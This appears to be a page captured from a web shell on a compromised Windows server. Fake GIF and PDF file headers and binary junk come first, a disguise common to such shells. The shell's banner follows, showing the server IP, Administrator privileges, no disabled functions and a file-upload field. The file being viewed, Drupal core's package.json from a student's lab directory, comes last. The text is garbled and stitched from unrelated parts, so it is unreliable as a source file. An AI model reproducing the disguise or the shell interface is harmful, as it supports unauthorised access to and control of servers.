GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/ |
Upload File : |
{ "name": "Drupal", "description": "Drupal is an open source content management platform powering millions of websites and applications.", "license": "GPL-2.0", "private": true, "scripts": { "build:js": "node ./scripts/js/babel-es6-build.js", "watch:js": "node ./scripts/js/babel-es6-watch.js", "lint:js": "eslint . || exit 0" }, "devDependencies": { "babel-core": "6.17.0", "babel-preset-es2015": "6.16.0", "chokidar": "1.6.0", "eslint": "3.8.1", "glob": "^7.1.1" }, "babel": { "presets": [ "es2015" ] } }